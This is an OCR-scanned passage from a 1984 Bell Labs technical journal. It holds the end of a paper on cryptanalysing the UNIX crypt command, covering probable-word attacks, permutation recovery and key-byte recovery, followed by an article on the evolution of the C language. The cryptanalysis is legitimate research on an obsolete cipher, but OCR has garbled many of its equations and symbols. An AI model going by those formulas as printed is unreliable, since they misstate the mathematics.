plaintext solution This, of course, is harder. We assume that the plaintext is all ASCII, and that the cryptanalyst has a stock of probable words or phrases that the plaintext plausibly contains. We proceed by trying to place a probable word in all possible positions in the current cryptoblock. Most of these trial placements will result in contradictions. Either they imply that some plaintext characters cannot be ASCII, or they are self-contradictory, or they contradict the implications of a previous placement of a probable word. We consider these cases one by one. FILE SECURITY 95 Suppose that one plaintext character, say p„ is known. Then one of the 2-cycles of A is known, the one that interchanges p* + i and Ci + i. There are 255 other values of i for which c, + i might fall in this 2-cycle, and the chance that none does is (127/128) 255 , which is about 0.135. (Since the success of the attack doesn’t depend on these calculations, the hidden randomness assumptions can remain hidden.) So with probability about 86.5 percent, we find some other value of j for which c, + j is in the known 2 -cycle, and so the corresponding value of pj is known too. If the initial guess at p; were wrong, then this guess at pj has a 50-percent chance of not being ASCII (assuming that all 128 ASCII characters are legal). Thus each individual guess at a plaintext character has better than a 40-percent chance of being shown wrong because it would imply some plaintext character is not ASCII. A longer probable word, incorrect in all its letters, is even less likely to be acceptable. There is another kind of constraint probable text imposes on the ciphertext. If there are two places, say i and j, in the same cryptoblock of plaintext satisfying p* + i = p ; + j , then the definition of A shows that Cj — d = i — j. For instance, the word “include”, common near the beginning of C programs, contains two of these constraints, “n.l” and “i ... d”. One expects only about one place in each cryptoblock where even one of these constraints is satisfied (other than at the place where “include” belongs), so the chance of the two being satisfied erroneously is quite small (but not negligible). Finally, a trial placement may be incompatible with earlier, ac- cepted, placements of probable words. This is all easy to package into programs. One could start with a special-purpose editor that gets probable text from the user and presents all contradiction-free placements and resulting decipherment. The user then accepts those placements that produce the best looking decipherment, and suggests new probable words. Such an editor can be used to decrypt a completely unknown C program in a few hours, or less. Getting one block generally takes a while, but then the cryptanalyst has a good idea of the style and subject of the program, and other blocks take less time. Sometimes it is useful to look first for all contradiction-free place- ments of a single, long probable word in all blocks of a file rather than look for several probable words in a single block. 3.3 A statistical attack The following idea was developed by Robert Morris. Before attack- ing an unknown plaintext, one can automatically generate a lot of plausible plaintext by a statistical analysis of each of the cryptoblocks. In essence one applies the unknown plaintext attack outlined above 96 TECHNICAL JOURNAL, OCTOBER 1984 to the 20 one-letter probable words formed by the 20 most common ASCII letters. Each of the possible 5120 trial placements of these “words” in a given cryptoblock is scored according to the resulting plaintext it generates, using a formula involving logarithms of the probabilities of the ASCII letters. Any decipherment resulting in non- ASCII letters is immediately ruled out. Otherwise, disputes between contradictory trial placements are resolved in favor of the trial place- ment with the greater score. This process ends with a partially deciphered cryptoblock with lots of “noisy” plaintext visible to an indulgent eye. It is easy to use guesses based on this noisy plaintext as a starting point for a session with an interactive crypt-breaking editor, as we described above. IV. KNITTING Once several blocks have been mostly decrypted, the corresponding information about the Ay can be used to recover R and S. Let Z = R~ l CR. Then (3) can be rewritten as Ay = Z~ j A 0 Z J and hence ZAj+i = AjZ. We call this the knitting equation : Z knits the Ay sequence together. We solve this last equation for Z, from which a value for R can be found. Once R is known, the equation S = RAjR- 1 gives a value for S. Even if all this works out, R and S are not completely determined, for if the pair (i?, S) works, so will ( C k R , C k SC~ k ), for any k. The idea behind solving for Z is simple. Suppose we hypothesize Zx = y. Then for each value of j for which Ay(y) = u and Ay+i(x) = u are known, it must be true that Zu = v. Hence if several successive A’s are fairly well known, each hypothesis about Z will generate several more, and so forth, and all these have to be consistent with all that is known about the A’s. In practice there is a chain reaction of hypotheses about Z that quickly leads to a contradiction if the initial guess was wrong. Once Z has been mostly recovered, one can use the knitting equation to fill in missing values in the A’s. V. RECOVERING SOME KEY BYTES Once R and S are known, it is possible to determine the first two FILE SECURITY 97 letters of the key the user typed. At the same time we discover which of the 256 equivalent (R, S) pairs was generated by crypt. 5 . 1 How R and S are built The user’s key is transformed into 13 bytes b 0 , b u • • • , bi 2 by the same subroutine used to encrypt UNIX passwords. b 0 and bi can be any characters the user can type, so 0 < b 0 , bi < 128, while the rest of the bi are restricted to the 64 characters “/”> “ • ”, “0”, • • • , “9”, “a”, « w « A » uryiy • • • , Z , A , • * • , n . From these bytes the program builds various pseudorandom num- bers from which it constructs R and S. The details are a bit tedious. First mix all the bi together: Xo = 123 Xi+i = xfii + i 0 < i < 12. Here arithmetic is done modulo 2 32 , and -2 31 < x ,* < 2 31 . Now compute a sequence of s’s: S-i = *o Si = 5si-i + b t 0 < i < 256. Here Si is computed modulo 2 32 , — 2 31 < Si < 2 31 , and the subscript on b is evaluated modulo 13. Next, compute some r’s: r t = Sj(mod 65521oo), where the peculiar notation means that r t has the same sign as Si and —65520 < n < 65520. Now compute Ui s ^(mod 256), 0 < a t < 256, Vi = r7256(mod 256), 0 < Vi < 256. Alternately, write r, in 2’s complement binary. Then u t is the number given by the low-order 8 bits, and i is the next 8 bits. Initialize an array representing R(i) so that R(i) = i for all i . Then compute R{i) from the Xi by calculating Xi = w t (mod i 4- 1), 0 < Xi < i + 1 swap R( 255 — i) and R(xi), successively, for i = 0, i = 1, • • • , i = 255. If the were uniformly distributed over a suitable set of integers, then all 256! possible R would be equally likely. Initialize an array representing S(i) to S(i) = 0 for all L Then for i = 0, i = 1, • • * , i = 255, successively, 98 TECHNICAL JOURNAL, OCTOBER 1984 If S(255 — i ) ¥=■ 0, do nothing. Otherwise, let y» = Vi (mod i), and then while S(y;) = 0 yi = y* + 1 (mod i) then S(255 — i) = y*, and S(y t ) = 255 — i. Then S is the product of 128 2-cycles. 5.2 Finding k Decrypting a file produces 256 cryptographically equivalent possi- bilities for ( R , S'). It is possible to determine which possibility crypt used and to recover the 6; all at once. First suppose we knew the values of all the r t . Then Si = 65521cj + r>, —65521 < Ci < 65521 St+i = 5s t -I- bi + M;2 32 , -2 < Mi< 2. The bounds on c and M follow from the bounds on s and b. Substituting and rearranging gives bi = r i+ 1 — 5 r* — 225 M* -I- 65521(c; + i — 5c* — 65551 Mi). Consider this equation modulo 65521. 6 must be ASCII, at least; there are only five possible values for M t ; and the r’ s are known. Incorrect values are unlikely to give acceptable U s. Also, each value of bi is constrained by values of i 13 apart. So knowing the r t will determine the bi. For the first part, we try each of the 256 possibilities in turn, assuming the current ones are the correct R and S, and attempting to reconstruct all the 6’s. In practice, for the 255 incorrect values of k the process below fails to construct a consistent set of V s, and so excludes all but the correct k. From the trial R it is easy to read off the x t that generated it. First, *255 = R( 255). Then modify R by making R(x 2 55 ) = R( 255), and proceed by induction. Here’s an example, with a permutation on eight things: k 01234567 R(k) 2 6 5 7 0 1 3 4 R( 7) was constructed, by the algorithm above, by switching the pre- vious value of R(7) with some R(i) with i less than 7. Hence jc 7 is 4, and, at the next step, we consider a permutation on seven things: FILE SECURITY 99 k 0 1 2 3 4 5 6 R(k) 2 6 5 4 0 1 3 From this jc 6 is 3, and so forth. The process is just running the construction of R backwards. Note that although R could plausibly be argued to be a random permutation, it is one that in no way conceals the data from which it was constructed. Randomness, in the sense of uniform distribution, is by no means synonymous with the intuitive meaning of not containing information. It is the latter property that is important to cryptography. A similar process allows us to get some of the y*. We get y 2 55 the same way we got *255, but we can only deduce other y t when we are sure that neither the while step nor the do-nothing step in the algorithm above were not executed. Now how close do x ,• and y, come to determining rp First, suppose we knew and v t . Then we would have 16 bits in the binary represen- tation of rj. Unfortunately, the possible values of r, require nearly 17 bits, so each pair (a„ vi) probably is consistent with two values of r,*; therefore in the expression for bi above there are likely to be four choices for (r,-, r I+ i). Clearly, there is still not much chance of getting even a single bad guess of a 6 t . So how do we get u* and vp Since Xi s u t (mod 256) for each i > 128, there are at most two choices of u t (namely, x t and Xi + i + 1) for each value of x t . Likewise, if we know y*, there are at most two choices for 1 Thus there are four more choices to be made for each guess at an r f *. In practice this is nearly enough to determine all of the 6, uniquely foi- exactly one value of k. That is, there is only one of the 256 equivalent (R, S) pairs for which there are any 6’ s left, and then there are never more than a few hundred possible sets. Only one of them, and therefore the correct one, regenerates R and S. There was no trouble doing this in 190 trials. Each trial takes a minute or two of computer time. Thus, decrypting files enough to determine (i?, S) also enables the cryptanalyst to find b 0 , • • • , b u - This would not be more than a curiosity, except for the fact that the first two bytes of the user’s key pass through unchanged and become b 0 and 61. This knowledge is clearly of great use in guessing how the user makes up his keys. VI. A PROPOSED ENHANCEMENT A recent proposal for strengthening the crypt command is as 100 TECHNICAL JOURNAL, OCTOBER 1984 follows. Instead of relating the ith plaintext and ciphertext letters in the jth cryptoblock by dj = C^R-'C-'SVRVpij, it is proposed to use dj = C~ fi R ~ l C~ j SC J RC fi P ij. R and S are as before. The new item is the function /, which may be interpreted as an irregular rotor motion. The key now is the triple ( R , S , /). If /were known, then the new cipher would be breakable by the same methods as the old. 6. / Known plaintext attack of proposed enhancement We first recover the /;, and proceed as before. We note that in a given cryptoblock, if + fi = p h + fk, for some i and fe, then d + fi — Ck + f k . Also, because the encryption is an involution, if p t = /, = c k + fk, then d + fi = Pk + fk . We can exploit these identities as follows. If Pi + fi = Pk + fk, then Ci + fi = Ck + fk and hence << 1 II je Oh 1 a o 1 o ar- il > 1 and Pi Pk Ci Ck • (4) (5) Thus (4) for some i and k implies (5) for the same i and k . We take the occurrence of (5) as a sign that the four equations of (4) might have happened, and further take the common value p* — Pk = d — c k as a vote for the value of fk — fi . Similarly, the occurrence of Pi Ck Cj Pk is a vote that fk — fi has this common value. Experiments show that of all occurrences of (5), about half are caused by (4) and half are accidental. The accidental occurrences scatter their votes higgledy-piggledy, but the causal occurrences vote en bloc for the correct value of f k — fi. Thus for each cryptoblock we enumerate all votes of the above type, representing them by triples (i, k , d), meaning that there is a vote that fi — fk = d. Let S be the set of all the votes. We attempt to resolve these votes by discarding about one-half of them and building the others into a self-consistent set of values for the fi. Note that although FILE SECURITY 101 each instance of a vote conies from one cryptoblock, the /; are the same from block to block, so that the votes from all the known blocks can be combined. Each cryptoblock contributes about 500 such votes, so 2500 char- acters of known plaintext will generate about 5000 triples. 6.2 Voting We are given a set S of 5000 or more triples (i, k d), each representing an equation fi — fk = d. We want to find a maximal consistent subset of these equations. That is, we want values /o, A, • • • , Ass that solve as many of these equations as possible. Here is one method that works in practice. We solve instead a seemingly more complicated problem: find prob- ability laws Pq, Pi, • • • , P 255 , each on the integers mod 256, such that l = n S x, - d) is maximized, where the Xs are independent random variables, each Xi with law Pi. If we let gij = P(Xi = j) = Pi([j j), then l = n = n H-e + U PiX> - tmiX ‘ = , + d \ 2 256 + 2 ? L is a function of the 65,536 nonnegative variables gij, subject to the 256 constraints Yjio gij = 1. Such a function may be readily maximized by the algorithm of Baum and Eagon, 1 also called the EM algorithm. In practice the maximizing g$ values are all close to 0 or 1, and we take for f t that value of j for which gij is biggest. This takes about 20 minutes of a VAX* computer’s time. VII. SUMMARY It turns out from this work that the UNIX system file-encryption command is not as strong as its designers had hoped. While a simple modification like the one discussed above makes encrypting short files safer, finding a much more satisfactory replacement appears hard. REFERENCE 1. L. E. Baum and J. A. Eagon, “An Inequality With Applications to Statistical * Trademark of Digital Equipment Corporation. 102 TECHNICAL JOURNAL, OCTOBER 1984 Estimation for Probabilistic Functions of Markov Processes and to a Model for Ecology,” Bull. AMS, 73 (May 1967), pp. 360-3. AUTHORS James A. Reeds, B.A. (Mathematics), 1970, University of Michigan; M.A. (Mathematics), 1972, Brandeis University; Ph.D. (Statistics), 1976, Harvard University; Assistant Professor of Statistics, University of California, Berke- ley, 1977-1982, AT&T Bell Laboratories, 1983 — . Mr. Reeds is in the Com- munications Analysis Research department of the Mathematical Sciences Research Center. Since coming to AT&T Bell Laboratories he has worked on cryptography and other computer games. Peter J. Weinberger, B.S. (Mathematics), 1964, Swarthmore College; Ph.D. (Mathematics), 1969, University of California at Berkeley; Bellcomm, Inc., 1969-1970; Instructor and Assistant Professor of Mathematics, University of Michigan, 1970-1976, AT&T Bell Laboratories, 1976 — . Mr. Weinberger is Head of the Computer Systems Research department. Since coming to AT&T Bell Laboratories he has worked on databases, operating systems, networking, and compilers. FILE SECURITY 103 AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A. The UNIX System: The Evolution of C — Past and Future By L. ROSLER* (Manuscript received September 12, 1983) The C programming language was developed originally to implement UNIX™ operating systems and their utilities. It has become a mainstay of systems and application programming at AT&T Bell Laboratories, and is rapidly growing in commercial importance. It continues to evolve in response to the needs of new environments, spanning the range from tiny peripheral controllers to huge electronic switching systems written and maintained by hundreds of programmers. There are severe reliability and real-time con- straints throughout this spectrum. This paper reports changes made so far to meet the needs of these new environments and indicates the directions of current developments. I. INTRODUCTION The C programming language was designed in the early 1970 , s by Dennis M. Ritchie as part of the development of the original UNIX operating system. 1 The capabilities of the language for programming portable operating systems were enhanced rapidly as the first UNIX system was ported to other processors. In 1978 Kernighan and Ritchie published the definitive description and reference manual 2 for the C programming language as it existed then. They were joined by Johnson and Lesk in a descriptive article 3 * AT&T Bell Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted with- out payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permis- sion. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor. 104 in this journal that evaluated the language after five years of experi- ence, and projected future directions for its growth. This paper reports changes made in the succeeding years and indicates the direction of current developments. A major trend in the development of C is toward stricter type checking, along the lines of languages like Pascal . 4 However, in ac- cordance with what has been called the “spirit” of C (meaning a model of computation that is close to that of the underlying hardware), many areas of the language specification deliberately remain permissive. This allows implementors the freedom to achieve maximum efficiency by using the instructions most appropriate for each machine. (For example, the sign of the remainder on a division involving negative integers is explicitly unspecified.) In keeping with the original sparse design of the language, nothing has been added that can only be implemented effectively by calling a run-time function. (This does not prevent an implementor from choos- ing to implement an operation in the language for which the hardware support is inadequate by a call to a hidden function. For example, this may be the most appropriate way to implement floating-point arith- metic on processors that do not support floating-point operations.) For this reason, the exponentiation operation is not part of the language, but must be explicitly invoked by the programmer as a function in the library. Many other capabilities (including input/output, storage allocation, and mathematics) are integral parts of other languages but not of C. For practical reasons of application portability, the libraries that provide these capabilities for C are also subject to standardization, so they now might reasonably be viewed as extensions of the language. In recent years, major enhancements in functionality and efficiency were made to these standard support libraries. However, this paper will focus on the language proper. Note that the material presented here represents changes to the AT&T Bell Laboratories definition of the language, not to any imple- mentation. No existing compiler fully implements the new definition as yet, which is itself subject to change as a result of standardization efforts. The reader is presumed to have some familiarity with C as presented by Kernighan and Ritchie . 2 References in parentheses refer to sections in The C Reference Manual printed as Appendix A of that book. However, this paper can be understood without having the book at hand. II. PORTABILITY AND STANDARDS To maintain the stability of a mature language while allowing EVOLUTION OF C 105 controlled evolution is both a technical and an administrative chal- lenge. Since 1977, the Computer Technologies Area of AT&T Bell Labo- ratories has sponsored a committee to develop and maintain internal C standards. This committee monitors and promotes the portability and evolution of the C language proper, the support libraries without which useful work in C is impossible, and the many UNIX systems and other environments in which C is implemented. As a result of that effort, applications that do not rely heavily on the characteristics of the supporting hardware or operating system can be moved from one environment to another without significant reprogramming. In recognition of the growing commercial importance of C, the American National Standards Institute (ANSI) chartered a technical committee (X3J11) to develop a standard for the language, libraries, and environment. The current schedule calls for a draft to be published for public comment early in 1985. III. MANAGING INCOMPATIBLE CHANGES Inevitably, some of the changes that were made alter the semantics of existing valid programs. Those who maintain the various compilers used internally try to ensure that programmers have adequate warning that such changes are to take effect, and that the introduction of a new compiler release does not force all programs to be recompiled immediately. For example, in the earliest implementations the ambiguous expres- sion x = -1 was interpreted to mean “decrement x by 1”. It is now interpreted to mean “assign the value —1 to x”. This change took place over the course of three annual major releases. First, the compilers and the lint program verifier 6 were changed to generate a message warning about the presence of an “old-fashioned” assignment operator such as = -. Next, the parsers were changed to the new semantics, and the compilers warned about an ambiguous assignment operation. Finally, the warning messages were eliminated. Support for the use of an “old-fashioned initialization” int x 1 ; (without an equals sign) was dropped by a similar strategy. This helps the parser produce more intelligent syntax-error diagnostics. Predictably, some C users ignored the warnings until introduction of the incompatible compilers forced them to choose between changing their obsolete source code or assuming maintenance of their own versions of the compiler. But on the whole the strategy of phased change was successful. 106 TECHNICAL JOURNAL, OCTOBER 1984 IV. SIGNIFICANT CHANGES The changes discussed in this section represent significant shifts in the orientation and capabilities of the language. Unless we explicitly state it, all the changes described are backward-compatible. 4. 1 Float and double In the arena of the original application of C (the implementation of UNIX systems), the efficiency of floating-point arithmetic was of little importance. Support libraries were simpler if only one type of value was handled. Furthermore, the hardware of the first production im- plementation favored the use of double precision over single precision. These considerations manifested themselves as a requirement that all floating-point arithmetic be done in double precision (Ref. 2, Sect. 6.2). In addition to providing a marginally useful increase in default accuracy, this choice helped keep the code generators simple. This requirement now seems inappropriate, in view of the following changed circumstances: 1. Because of its other desirable attributes, C is being used more frequently in areas such as scientific calculation, where computation- ally oriented languages such as Fortran were the traditional choices. A general-purpose language should support floating-point arithmetic as efficiently as possible. 2. In fact, most implementations perform double-precision arith- metic more slowly than single -precision, and access to the operands is more costly. 3. Many code generators for C are enhanced to share support for languages (such as Fortran) that require single-precision arithmetic in a single-precision context. Therefore, C compilers may now use single-precision operations to implement floating-point arithmetic that involves single-precision op- erands. Interfunction linkages (arguments, formal parameters, and return values) declared to be float are still coerced implicitly to double. This resembles the widening of char and short arguments to int, and simplifies the maintenance of libraries and the specifica- tion of constants as arguments. The called function can declare the formal parameter as float if desired. 4.2 Type specifiers 4.2.1 Void Unlike many other languages, C makes no syntactic distinction between procedures that return a value (functions) and procedures that have only side effects (subroutines). Both are called functions in C. Because most useful functions do return values, in particular integer values in most systems programming environments, the language EVOLUTION OF C 107 permits the declaration for a function returning an integer to be omitted (Ref. 2, Sect. 13). Furthermore, even if a declaration is given, for example: extern f ( ) ; if no type is specified it is taken to be integer (Ref. 2, Sect. 8.2). This convenient default leads to various incorrect descriptions re- garding functions that in fact return no value. For example, how could one declare a pointer to such a function? As some type must be specified: int (*fp) ( ) = f ; the declaration is interpreted as a pointer to a function returning an integer, even though no value is in fact returned. The new type void has been added to deal with this anomaly. It can be used only to declare a function that returns no value or as a cast to state explicitly that the value returned by a function is being ignored. Obviously, the nonexistent “value” of a function declared as returning void cannot be used in an expression or cast to any other type. 4.2.2 Enum An enumeration data type has been added to C. It is similar in intent to the enumerated type of Pascal — to restrict the set of values that can be assigned to specific integer variables. In the following example enum fruit {apple, orange, pear} lunch, dinner; lunch and dinner are integer variables that have assigned to them only the values apple, orange, or pear. The optional tag fruit may be used to refer to this enumeration elsewhere. A significant difference from Pascal is that values may be specified for any or all of the integer constants that constitute an enumeration: enum permissions { read = 4 , write = 2 , execute = 1 } ; A value may even be duplicated: enum unities { one = 1 , uno = 1, eins = 1, odin = 1}; The name of an enumeration constant may not be reused in a different enumeration, however, even with the same value. The successor, predecessor, and ordinal functions of Pascal are not available. Therefore, it is not possible in C to write a simple loop over the values of an enumeration variable, because they need not form a linear sequence. 108 TECHNICAL JOURNAL, OCTOBER 1984 Enumeration constants provide a convenient way of moving into the compiler proper a task that could be handled in the preprocessor by a list of #def ine names. This helps in symbolic debugging, as the identifiers themselves appear in the symbol table. It also eliminates the need to supply sequential values that may in themselves have no interest. 4.3 Structures and unions 4.3. 1 Names of members In the original specification (Ref. 2, Sect. 8.5), all members of structures in a single compilation had to have unique names. The only exception was that the same name could be used in two different structures if the type and offset were the same in both. Because of the likelihood of name conflicts in large applications (where header files might include several hundred structure defini- tions), these rules were relaxed to allow the same name to be used in more than one structure or union, even with different types or offsets. For this to be effective, any reference to a structure or union member must be fully qualified, and the type of reference must be the same as the type of structure or union containing the member referred to. In other words, it is no longer valid to refer to one type of structure using a pointer declared as pointing to another type of structure, or using an integer as a pointer. An explicit cast must be used. This closes a previous loophole (Ref. 2, Sect. 14.1) and is not backward- compatible. (Type equivalence is name equivalence — structures with different tags are of different types, even if their members are identi- cal.) This major change was introduced in phases, in the same way as the change from =op to op= described in an earlier section. Compiler warnings identified incomplete qualifications and type conflicts, but the programs could still be compiled unambiguously, as the names of members all had to be unique to begin with. 4.3.2 Assignments / parameters, and function values As Ref. 2, Sect. 14.1 predicts, the semantics of structures and unions has been enriched. The value of a structure or union may be assigned to another one of the same type; a structure or union may be passed as an argument to a function; and a function may return a structure or union as its value. For example: struct s a , b, f ( ) ; a = b ; a = f ( b ) ; are valid declarations and statements. Even though similar operations on arrays exist in other languages, EVOLUTION OF C 109 these desirable enhancements could not be retrofitted to arrays in C. The interpretation of an array name as a pointer expression is em- bedded too deeply in existing programs (Ref. 2, Sect. 7.1). V. OTHER CHANGES These changes are presented here in the order of the relevant sections in The C Reference Manual. They also are backward-compat- ible, except as described. 5. 1 Lexica I conventions Form feeds and vertical tabs are added to the list of characters (Ref. 2, Sect. 2) that serve as “white space” to separate tokens and “line breaks” for compiler control lines. No semantics had previously been ascribed to these characters. 5.2 Key words As we discussed above, two new key words, void and enum, were added to represent new types. This change affects only programs that happened to use those words as identifiers. The entry key word (Ref. 2, Sect. 2.3) was never implemented and is no longer reserved. 5.3 Constants The digits 8 and 9 are no longer accepted in octal-integer constants (Ref. 2, Sect. 2.4.1). Though not backward-compatible, this change had little impact, as few programmers used this quirk in writing octal constants. Previously, the backslash in an undefined escape sequence in a character or string constant was explicitly ignored (Ref. 2, Sect. 2.4.3), so that 1 \z * , for example, was a strange but acceptable way of writing ' z ' . Now, the meaning of an undefined escape sequence is explicitly undefined, so ' \ z 1 has no meaning. This too is an incompatible change, but is justifiable since it allows new escape sequences to be defined in the future without affecting existing valid programs. As an example, the escape sequence \v has been added to denote a vertical tab. A proposal has been adopted to use the escape sequence \xddd to describe a hexadecimal constant, analogous to the existing \ddd notation for an octal constant. 5.4 Initialization Arbitrary restrictions in any area of a language are undesirable, since they add to the difficulty of learning and using it. The restriction against initializing an automatic array or structure (Ref. 2, Sect. 8.6) was based on practical considerations of compiler 110 TECHNICAL JOURNAL, OCTOBER 1984 complexity, not on theoretical objections. This restriction has been removed, though no compiler yet implements this capability. The syntax is identical to that used for initializing an external or static array or structure. The restriction against initializing a union was based on the lack of suitable unambiguous syntax. The ANSI draft standard will propose that a union be initialized according to the type of the first member in its declaration, ascribing for the first time significance to the order of declaration. With these changes, there will no longer be any object that cannot be initialized. 5.5 Type specifiers Every size of integer now has a corresponding unsigned type (Ref. 2, Sect. 8.2). In anticipation of the extension of C to support more than two sizes of floating-point numbers (in accordance with a proposed IEEE standard 6 ), the type long float is no longer accepted as a synonym for double. This change should have minimal impact on existing programs, as the synonym seems to have been used infrequently, if at all. 5.6 Defined type Even though in a construction such as typedef int KILOMETERS ; KILOMETERS distance; the type of distance is int (Ref. 2, Sect. 8.8), the defined type may not be further modified by long, short, or unsigned. For example, long KILOMETERS to_the_moon ; is invalid; a new type must be defined: typedef long int ASTRONOMICAL; ASTRONOMICAL to_the_moon ; This is a clarification, not a change. 5.7 Switch statement The restriction that the controlling expression of a switch statement have type int (Ref. 2, Sect. 9.2) is being removed. Any integral type will be permitted, and the case-expressions will be coerced to that type. 5.8 External data definitions Of all the areas of potential change, this has caused the most EVOLUTION OF C 111 controversy. The manual states (Ref. 2, Sect. 10.2) that the default storage class for an external data definition is extern. Thus, when several external data definitions of the form int i appear, the inten- tion is to define a single variable, i, whether or not the extern key word is present. This implies the existence of a mechanism similar to that of Com- mon in Fortran, which associates multiple definitions of the same external identifier. Limitations in the support software in several vendor-supplied operating systems make it difficult or impossible to implement this design intent. Therefore, a distinction was introduced (Ref. 2, Sect. 11.2) in the use of the extern key word - its appearance indicated a declaration for the external variable in question, its absence indicated a definition. Most important of all, there has to be exactly one such definition in the set of files constituting a single program. Thus this restriction is actually a portability constraint imposed by some environments, not a characteristic of the C language itself. The capability of many UNIX system implementations to allow more than one identical external data definition to appear (without the extern key word) is considered to be an extension to the more restrictive ANSI draft standard. 5.9 Compiler control lines The conditional-compilation facility (Ref. 2, Sect. 12.3) has been enhanced in two ways. To facilitate selection of one among a set of choices, any number of control lines of the form #e 1 i f constant-expression may now appear between a #if line and its closing #endif (or #eise if present). The new pseudofunction defined ( identifier ) may be used in the constant-expression part of a #if or #elif control line, with value 1 if the identifier is currently defined in the preprocessor, and 0 other- wise. Thus, #i f def identifier is equivalent to#if defined ( identifier ), and #i f ndef identifier is equivalent to #i f ! defined ( identifier ). The older forms will be retained for backward compatibility, as they are deeply entrenched in existing code. But, as they are superfluous, equivalents to #ifdef will not be provided for the new construction #elif . VI. INTRACTABLE PROBLEMS 6.1 Preprocessing One unfortunate effect of preprocessing the text before compilation is that programmers must know which functions are macroinstruc- 112 TECHNICAL JOURNAL, OCTOBER 1984 tions. They may not be declared; they do not obey the call-by-value semantics of C functions; and their arguments may be evaluated an unknown number of times, so side effects are unpredictable. A general trend for the future will be to rely less on the preprocessor and more on the compiler. 6.2 Integer sizes Although the portability of C has been amply demonstrated over the past decade, 5,7 persistent problems arise where the size of a long int differs from that of an ordinary int. For example, the difference of two pointers has been described as an ordinary int (Ref. 2, Sect. 7.4). But in a large-address environment where a pointer has the same size as a long int (Ref. 2, Sect. 14.4), an ordinary int may not be large enough to store the difference. This would impose an arbitrary limit on the size of an array. It is now agreed that the difference should have the same size as the pointers being subtracted. This solves the problem only in part. Consider the common situation where the difference is used, for example, as an argument to an input/ output function. Such an argument cannot be declared portably, but a suitable type definition could be provided as part of a standard header file. VII. FUTURE DIRECTIONS All the enhancements and changes to the language defined by Kernighan and Ritchie 2 discussed in the preceding sections exist in many widely used compilers and have been presented to the ANSI X3J11 committee for standardization. The section that follows deals with later proposals that are still being evaluated. One major proposed enhancement, the introduction of classes (ab- stract data types) similar to those of Simula, is presented in a com- panion article. 8 Other enhancements, presented in this section, are in use internally, but have not yet been exposed to large numbers of programmers. They are reported here to indicate some of the antici- pated directions of language evolution. 7.1 Argument typing At present, most C compilers make no checks on the number and type consistency of function invocations, even within a single compi- lation. In UNIX systems, this responsibility is delegated to the lint program verifier, which checks, among many other things, the con- sistency of function interfaces over an entire program set and associ- ated libraries. Because of the computer resources required to do the extra parsing EVOLUTION OF C 113 involved, the cost of using lint in the development of very large programs may be prohibitive. User-generated lint libraries that de- clare function arguments and return values but omit function bodies relieve this cost somewhat, but must be kept in phase with the real source. It would be better to provide a way, as part of a function declaration, for the compiler itself to be informed of not only the type returned by the function (as at present), but also of the types of the function arguments. A method has been developed to do this in a backward-compatible way . 9 In a function declaration, arguments may be declared sequen- tially by type, thus: + char *fgets(char *, int, FILE *) ; When no further information about the arguments is provided, a trailing comma is added: int f scant ( FILE * , char * , ) ; When no information at all about the arguments is provided, nothing is between the parentheses, which is compatible with existing pro- grams. The special case of declaring a function with no arguments is handled via the void key word: int rand( void) ; Perhaps the most important payoff of argument typing is that, if possible, an argument is coerced to the type of its corresponding formal parameter, as if by assignment. This will eliminate a major source of interface errors in large programs. Incompatibilities (such as an integer argument and a pointer formal parameter) will cause fatal compilation errors. 7.2 The "const" type specifier A new type specifier, const, has been added 9 to meet a need that has long been recognized — declaring that the value with which a particular variable is initialized may not be changed during execution of the program. In some environments, this may simply tell the compiler not to allow the variable to appear on the left-hand side of an assignment and not to allow its address to be assigned to a pointer through which it may be modified. (Such an implementation could not protect against an inadvertent modification caused by a wild pointer.) This is the most protection that can be provided if the const variable has auto + The examples are functions in the Standard Library, partly described in Chapter 7 of Kernighan and Ritchie. 2 114 TECHNICAL JOURNAL, OCTOBER 1984 or register storage class, so that it is initialized dynamically on each entry to the block in which it is defined, and the value with which it is initialized is itself variable. If the storage class of the variable is extern or static, or if the initializer is constant, the compiler may be able to place the data in an area of memory protected by hardware against modification. This also allows space to be saved by sharing the data among several simultaneous executions of the program, just as the program text may be shared in some implementations. The data may even be placed into read-only memory if desired. This mechanism is particularly appropriate for large arrays of permanent data, such as parse tables or constant character strings. To achieve the desired end, some programmers have resorted to editing the assembly language produced by current compilers. At the cost of reserving yet another key word (possibly used as an identifier in existing programs), this new facility legitimizes the needed capability in the language proper. An interesting distinction can be made between pointers that them- selves are constant: char * const constant-pointer and pointers to constant data: const char * pointer-to-constant The latter can be used to declare that even though an argument is a pointer the function does not change the data pointed to. char *strcpy(char *, const char *) ; declares that strcpy gets two arguments that are character pointers, but does not change the array pointed to by the second argument. 7.3 Assembler windows Access to the hardware of the operating environment is often requested. Code for implementing operating systems or device drivers may need to manipulate particular registers or to execute instructions that are inaccessible from C but accessible through the assembly language of the machine. Assembly language may also be needed for efficiency. For example, C does not support the assignment of one array or string to another, and the programmer must write a loop to do this operation one element at a time. Yet many machines have extremely efficient implementa- tions for block moves. The need for access to special hardware is recognized by providing standardized library functions, which may be implemented either in EVOLUTION OF C 115 C or in assembly language as appropriate to a particular environment. But, in time-critical applications, even the overhead of function link- age may be too high. Therefore, the need has long been felt for the ability to interject instructions in assembly language directly in the midst of C code. The use of such a mechanism destroys portability, and may interfere with analysis or optimization of the function containing the alien state- ments. Many existing C compilers use the key word asm for this purpose. A statement of the form asm (string); causes the specified string to be injected directly into the assembly- language output of the compiler. This capability is still not powerful enough for many applications. No access is provided to identifiers in the C program, so the program- mer may have to make assumptions about which registers should be addressed by the assembly-language statements. An experimental implementation now being evaluated uses the key word asm in a different context . 10 A declaration of the form asm f(argl, arg2 , •••)(•••) defines a function / to be compiled in line (without function linkages). The programmer can specify alternate assembly-language expansions in the function prototype, depending on the storage classes of the actual parameters. VIII. EVOLUTIONARY STUBS By no means have all the experimental enhancements made to C been accepted as part of the official language. Many developers have tried to enrich the syntax of the language to individual tastes, but these efforts did not win wide support. This section describes one evolutionary stub of more substantial significance, which though it did not lead to changes in C did provide valuable insight into an important problem in the development of large programs by many programmers. In a very large multifile C program, it is difficult to control the scopes of external definitions except by carefully structuring a multi- plicity of header files and including them selectively in the various compilation units. One project tried a different solution to this prob- lem: introducing new preprocessor directives to export explicitly the definitions of specific variables to other files and to import the decla- rations from other files. To eliminate unnecessary compilation, a 116 TECHNICAL JOURNAL, 